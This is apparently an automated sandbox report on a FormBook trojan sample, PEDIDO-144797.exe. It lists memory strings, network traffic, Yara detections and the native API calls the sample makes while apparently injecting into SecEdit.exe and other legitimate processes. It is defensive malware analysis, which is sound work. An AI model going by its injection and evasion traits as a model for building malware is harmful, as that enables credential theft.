        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com~0
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comF0
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.glamour.com/story/shag-haircut-photos-products
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.instyle.com/hair/shag-haircut-face-shape
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonella
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1p
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1
        Source: explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/cut-
        Source: explorer.exe, 00000005.00000000.91561655678.000000000972E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/drift-boss
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/johnny-gaudreau-s-wife-reveals-in-eulogy-she-s-pregnant-expecti
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownHTTPS traffic detected: 142.251.40.206:443 -> 192.168.11.20:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.97:443 -> 192.168.11.20:49733 version: TLS 1.2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E34E0 NtCreateMutant,LdrInitializeThunk,2_2_326E34E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_326E2BC0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_326E2B90
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_326E2EB0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_326E2D10
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E4260 NtSetContextThread,2_2_326E4260
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E4570 NtSuspendThread,2_2_326E4570
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2A10 NtWriteFile,2_2_326E2A10
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2AC0 NtEnumerateValueKey,2_2_326E2AC0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2AA0 NtQueryInformationFile,2_2_326E2AA0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2A80 NtClose,2_2_326E2A80
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2B20 NtQueryInformationProcess,2_2_326E2B20
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2B00 NtQueryValueKey,2_2_326E2B00
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2B10 NtAllocateVirtualMemory,2_2_326E2B10
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2BE0 NtQueryVirtualMemory,2_2_326E2BE0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2B80 NtCreateKey,2_2_326E2B80
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E38D0 NtGetContextThread,2_2_326E38D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E29F0 NtReadFile,2_2_326E29F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E29D0 NtWaitForSingleObject,2_2_326E29D0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C98B1 SleepEx,NtCreateSection,3_2_050C98B1
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_050C9AB4 SleepEx,NtResumeThread,3_2_050C9AB4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F334E0 NtCreateMutant,LdrInitializeThunk,4_2_02F334E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32A80 NtClose,LdrInitializeThunk,4_2_02F32A80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_02F32BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02F32B90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32B80 NtCreateKey,LdrInitializeThunk,4_2_02F32B80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02F32B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32B00 NtQueryValueKey,LdrInitializeThunk,4_2_02F32B00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F329F0 NtReadFile,LdrInitializeThunk,4_2_02F329F0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32E50 NtCreateSection,LdrInitializeThunk,4_2_02F32E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32F00 NtCreateFile,LdrInitializeThunk,4_2_02F32F00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32CF0 NtDelayExecution,LdrInitializeThunk,4_2_02F32CF0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32C30 NtMapViewOfSection,LdrInitializeThunk,4_2_02F32C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_02F32D10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F34260 NtSetContextThread,4_2_02F34260
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F34570 NtSuspendThread,4_2_02F34570
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32AC0 NtEnumerateValueKey,4_2_02F32AC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32AA0 NtQueryInformationFile,4_2_02F32AA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32A10 NtWriteFile,4_2_02F32A10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32BE0 NtQueryVirtualMemory,4_2_02F32BE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32B20 NtQueryInformationProcess,4_2_02F32B20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F338D0 NtGetContextThread,4_2_02F338D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F329D0 NtWaitForSingleObject,4_2_02F329D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32ED0 NtResumeThread,4_2_02F32ED0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32EC0 NtQuerySection,4_2_02F32EC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32EB0 NtProtectVirtualMemory,4_2_02F32EB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32E80 NtCreateProcessEx,4_2_02F32E80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32E00 NtQueueApcThread,4_2_02F32E00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32FB0 NtSetValueKey,4_2_02F32FB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32F30 NtOpenDirectoryObject,4_2_02F32F30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32CD0 NtEnumerateKey,4_2_02F32CD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F33C90 NtOpenThread,4_2_02F33C90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32C50 NtUnmapViewOfSection,4_2_02F32C50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F33C30 NtOpenProcessToken,4_2_02F33C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32C20 NtSetInformationFile,4_2_02F32C20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32C10 NtOpenProcess,4_2_02F32C10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32DC0 NtAdjustPrivilegesToken,4_2_02F32DC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32DA0 NtReadVirtualMemory,4_2_02F32DA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02F32D50 NtWriteVirtualMemory,4_2_02F32D50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DDEEBA NtQueryInformationProcess,4_2_02DDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DE3A48 NtResumeThread,4_2_02DE3A48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DE3728 NtSuspendThread,4_2_02DE3728
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DE3408 NtSetContextThread,4_2_02DE3408
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DE3D68 NtQueueApcThread,4_2_02DE3D68
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00404D900_2_00404D90
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00406ABA0_2_00406ABA
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326722452_2_32672245
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276124C2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D2EC2_2_3269D2EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276F3302_2_3276F330
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE3102_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A13802_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275E0762_2_3275E076
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327670F12_2_327670F1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BB0D02_2_326BB0D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A00A02_2_326A00A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E508C2_2_326E508C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F717A2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274D1302_2_3274D130
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277010E2_2_3277010E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F1132_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E02_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B51C02_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D46702_2_326D4670
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275D6462_2_3275D646
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274D62C2_2_3274D62C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CC6002_2_326CC600
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276F6F62_2_3276F6F6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AC6E02_2_326AC6E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327236EC2_2_327236EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276A6C02_2_3276A6C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B06802_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B27602_2_326B2760
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BA7602_2_326BA760
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327667572_2_32766757
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B04452_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277A5262_2_3277A526
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327675C62_2_327675C6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276F5C92_2_3276F5C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276EA5B2_2_3276EA5B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276CA132_2_3276CA13
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CFAA02_2_326CFAA0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276FA892_2_3276FA89
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276FB2E2_2_3276FB2E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326EDB192_2_326EDB19
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0B102_2_326B0B10
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32724BC02_2_32724BC0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326968682_2_32696868
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276F8722_2_3276F872
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B98702_2_326B9870
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB8702_2_326CB870
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327508352_2_32750835
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B38002_2_326B3800
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE8102_2_326DE810
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327678F32_2_327678F3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B28C02_2_326B28C0
